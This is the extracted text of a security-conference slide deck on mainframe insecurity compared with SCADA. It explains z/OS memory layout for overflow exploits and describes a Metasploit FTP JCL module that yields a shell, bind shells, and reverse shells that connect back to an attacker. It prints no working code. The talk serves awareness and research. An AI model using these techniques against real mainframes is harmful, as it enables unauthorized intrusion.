Top Banner

of 83

A Stuxnet for Mainframes

Apr 13, 2017

ReportDownload

Technology

  • A STUXNET FOR MAINFRAMES

  • Cheryl Biswas

    Security researcher/analyst Threat Intel

    APTs, Mainframes, ICS SCADA, Shadow IT, StarTrek

    BSidesLV, Circle City, BSidesT0, SecTor, Hackfest, TiaraCon

    https://whitehatcheryl.wordpress.com

    Twitter: @3ncr1pt3d

    DISCLAIMER: The views represented here are solely her own and not those of her employers, past or present.

    11/4/2016@3ncr1pt3d A Stuxnet For Mainframes

  • HEAD IN THE SAND DEFENCE

  • YOU SAY SCADA

    WE SAY MAINFRAMES

  • MOM!! THE INTERNET IS BROKEN

  • INTRO

    In the beginning

    There were mainframes

    And it was good.

  • Then came Scada. And it was good too. https://www.google.ca/url?sa=i&rct=j&q=&esrc=s&source=images&cd=&cad=rja&uact=8&ved=0ahUKEwj85ODe-5HNAhVO3mMKHc8FAPoQjRwIBw&url=

    http%3A%2F%2Ffossils-archeology.wikia.com%2Fwiki%2FAnkylosaurus&psig=AFQjCNGq6-7u8ZwwlVa8TYJrf2UIluqCyg&ust=1465253196880476

  • CONGRATULATIONS! ITS A ... PLC

  • BUT THEN CAME ...

  • WHAT IS SCADA

  • I CANT LIVE ... IF LIVING IS WITHOUT YOU

  • DOES NOT PLAY WELL

    WITH OTHERS

  • WHAT ARE MAINFRAMES?

  • MAINFRAMES RIGHT?

  • THESE ARE NOT THE MAINFRAMES YOURE LOOKING FOR

  • THIS AINT YOUR GRANDMAS MAINFRAME

  • MAINFRAMES - BUILT TO LAST High Availability

    Longevity

    Virtualization

    The ability to offload to separate engines

    Backward compatibility with older software

    Massive Throughput

    https://en.wikipedia.org/wiki/Mainframe_computer

  • @3ncr1pt3d A Stuxnet For Mainframes 11/4/2016

  • SCADA MAINFRAME Culture Security Approach Perceptions Built to Last Closed off Does not play well

    with others

    Culture Security Approach Perceptions Built to Last Closed off Does not play well

    with others

  • Innovation

    DisruptionWould you like some security

    with that?

  • SECURITY BASICS WE KEEP GETTING WRONG Passwords

    Encryption

    Access

    Patchinghttp://blog.senr.io/blog/unique-snowflakes-or-ubiquitous-tech-the-truth-behind-the-industrial-internet-of-things-iiot

  • ICS / SCADA - WHAT HAVE WE LEARNED?

  • "NONE OF OUR SCADA OR ICS

    EQUIPMENT IS ACCESSIBLE FROM THE INTERNET."

    O RLY?

  • PROJECT SHINE

    1,000,000 SCADA ICS

    DEVICES FOUND ONLINE

  • SCADA ATTACK VECTORS

  • SCADA ATTACKSMalicious Trojan

    http://www.risidata.com/Database

  • SCADA ATTACKSStolen equipment

    http://www.risidata.com/Database

  • SCADA ATTACKSSocial Engineering

    http://www.risidata.com/Database

  • SCADA - JUMPING AIR GAPS Designed for underwater communication

    Near ultrasonic frequency

    Remote key logging for multiple hops

    http://www.jocm.us/index.php?m=content&c=index&a=show&catid=124&id=600

  • MAINFRAMES & SCADA - THE LINKS Similar in Culture

    Lack of security

    Perceived as secure

    Air Gapped

    See no evil cuz you dont see it if you arent

    looking

  • BUT ITS AIR GAPPEDMainframe modernization or exposing the classic

    system of record data to new services means that the data is no longer isolated on the mainframe the

    world is now unknown, unknown. We have lost sight and control of where the data is going the minute we try to harness mainframe data for other purposes than

    batch or transaction applications.zOS Expert

    http://www.symantec.com/connect/blogs/mind-gap-are-air-gapped-systems-safe-breaches

  • MAINFRAME - LACK OF ATTACK DATABecause What you dont see wont hurt you

  • CULTURE

    http://mainframed767.tumblr.com/post/79167015212/please-dont-post-on-mainframe-forums?is_related_post=1

  • MAINFRAME EXPLOIT RESEARCH

  • MAINFRAME - EXPLOIT RESEARCHBigendiansmalls

    https://www.bigendiansmalls.com/category/security/exploit-development/

  • MAINFRAME - NMAP

    Can now detect Mainframe portsMainframe banners are not staticMore accessible to others for hacking

    http://mainframed767.tumblr.com/post/132669411918/mainframes-and-nmap-together-at-lasthttp://mainframed767.tumblr.com/post/47105571997/nmap-script-to-grab-mainframe-screens

    http://mainframed767.tumblr.com/post/132669411918/mainframes-and-nmap-together-at-lasthttp://mainframed767.tumblr.com/post/132669411918/mainframes-and-nmap-together-at-lasthttp://mainframed767.tumblr.com/post/132669411918/mainframes-and-nmap-together-at-last

  • MAINFRAMES - BIND SHELLCODEMainframe assemblerEBCDIC to ASCII converterConnect with NetCat

    https://www.bigendiansmalls.com/mainframe-bind-shell-source-code/

    ASCII TO EBCDIC

    ASCII TOEBCDIC EBCDIC TO ASCII

  • LETS GET TECHNICAL

  • MAINFRAMES - STACK BUT DIFFERENTMainframe prologue creates Dynamic Storage Area

    Points to next free byte on the stack used

    Does not subtract from ESP to allocate space

    Register used as a stack pointer

    Not forced to do so.

    https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-and-cease-and-desist-letters-guest-post-2/

  • ALLOCATION OF MEMORY - FUNCTION PROLOGUE

    0x80123430x8012344Function Called0x8012345 - SFP

    IP

    EBP

    MAIN()ESP

    EBP

    SFPESP +

  • ALLOCATION MEMORY - FUNCTION PROLOGUE

    0x80123450x8012344Function Called

    IP Allocated Memory

    EBP

    -28ESPMAIN() FUNCTION()

    SFPESP +

  • ALLOCATION MEMORY - FUNCTION EPILOGUIE

    IP

    EBP

    MAIN()ESP

    EBP

    SFPESP +

    SFP

  • ALLOCATION MEMORY - DSA PROLOGUE

    0x80123450x8012344Function Called

    IPDynamic Storage Area

    MAIN()

    Pointer to original DS

    DSA NOT STACK

    Save Area

  • Not gonna happen

    HOW TO EXPLOIT - STRING EXPLOITATION != WINAlways aware of length

    StringStringStringStringString

    Length

    StringStringStringStri

    Length

    https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-and-cease-and-desist-letters-guest-post-2/

    AAAAAAAAAA

  • MAINFRAMES - UNIQUE TO EXPLOITS0C1 Exception

    http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le

    AAAAAAAAAAAAAAAAAAAAA

    Memory containing Data

    OPCODESOPCODE does not exist

    No size checking

    AAAAAAAA

    Overflow causes execution to branch to another memory location

  • MAINFRAMES - UNIQUE TO EXPLOITS0C1 Exception

    http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le

    DSA Level 0 DSA 1

    Returns to DS 0

    DSA Level 0 DSA 2

    DSA Level 1

    Register 14 = RP

  • MAINFRAMES - UNIQUE TO EXPLOITGlobally addressed arraysS0C1 Exception

    http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le

    DSA Level 0 DSA 2DSA Level 1

    Register 14 = RP

    DSA 2DSA 1 DSA 3

    Procedure returns to Level 1

    Actually executes code in DSA2

  • MAINFRAMES - INSECURITY OF MEMORYMemory not more secure than Windows or Unix.No DEPNo strict ASLR

    http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le

  • ACCESSIBLE TO YOU!

  • FTP EXPLOIT

    EXPLOIT/MAINFRAME/FTP/FTP_JCL_CREDS

  • MAINFRAME - FIRST METASPLOIT MODULEPoorly configured FTP server.FTP -> Shell

    https://www.bigendiansmalls.com/a-logical-first-step/

  • FTP METASPLOIT MODULE

    ARCH_CMD Executes a command, or uses a command to give a shell

    Platform: Mainframe Uses the Mainframe payloads of metasploit

    Target Automatic Only works with IBM FTP CS V.R.

    Requires Credentials Credentials allow a file to be uploaded

    Debugging enabled Can enable Verbose and FTPdebug

    https://www.bigendiansmalls.com/a-logical-first-step/https://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_creds

    https://www.bigendiansmalls.com/a-logical-first-step/https://www.bigendiansmalls.com/a-logical-first-step/https://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_credshttps://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_credshttps://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_creds

  • FTP METASPLOIT MODULEChecks BannerIf banner correct, logs in and uploads fileFile is uploaded as JOB & executes

    https://www.bigendiansmalls.com/a-logical-first-step/@3ncr1pt3d A Stuxnet For Mainframes 11/4/2016

  • GENERIC JCL TEST FOR MAINFRAME EXPLOITSThis can be used as a template for other JCL based payloads

    https://www.rapid7.com/db/modules/payload/cmd/mainframe/generic_jclhttps://www.bigendiansmalls.com/a-logical-first-step/

  • Z/OS (MVS) COMMAND SHELL, REVERSE TCPCreates a reverse shell.This implementation does not include ebcdic character

    translation, so a client with translation capabilities is required. MSF handles this automatically.

    https://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_credshttps://www.bigendiansmalls.com/mainframe-bind-shell-source-code/

    https://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_credshttps://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_credshttps://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_creds

  • GENERIC COMMAND SHELLConnect back to attacker and spawn a command shell

  • HOW THE MIGHTY FALL

  • BIGEND